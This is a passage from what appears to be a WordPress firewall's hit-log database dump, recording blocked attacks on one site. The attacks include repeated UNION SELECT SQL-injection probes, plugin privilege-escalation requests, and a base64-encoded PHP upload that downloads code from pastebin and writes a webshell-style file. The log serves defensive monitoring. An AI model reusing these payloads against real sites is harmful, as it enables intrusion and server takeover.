R%2845%2C120%2C50%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C53%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDUxLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw1Miw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTMsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8099,1564715989.303688,1564715988.845500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C52%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDUxLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw1Miw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8100,1564715986.851148,1564715986.531800,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C51%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDUxLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8071,1564682744.722804,1564682744.175000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8072,1564682743.126082,1564682742.516100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8073,1564682741.448039,1564682740.723800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8074,1564682739.649379,1564682737.606200,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8102,1564715982.712003,1564715982.265500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8075,1564682758.086720,1564682757.534900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8076,1564682756.709362,1564682756.141100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8077,1564682819.700650,1564682819.134900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8078,1564682818.170760,1564682817.671300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8101,1564715985.369320,1564715983.824200,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C50%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8079,1564682816.489598,1564682815.786800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8080,1564682814.794850,1564682814.326300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8157,1564804249.880308,1564804249.546200,'\0\0\0\0\0\0\0\0\0\0F=',0,403,0,0,0,'https://mail.companyregistration.online/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tODBlZmFkMjg5MzZjYjY4ZGY2NDEyZjQzOWNlYTI4OGENCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"ImZpbGUiOyBmaWxlbmFtZT0iZmlsZXMvc2V0dGluZ3NfYXV0by5waHAiDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGENCg0KPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIiA7DQokdGV4dCA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvcGhBTThERkgnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy84ODB1ZmFXRicpOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCg0KLS04MGVmYWQyODkzNmNiNjhkZjY0MTJmNDM5Y2VhMjg4YS0tDQ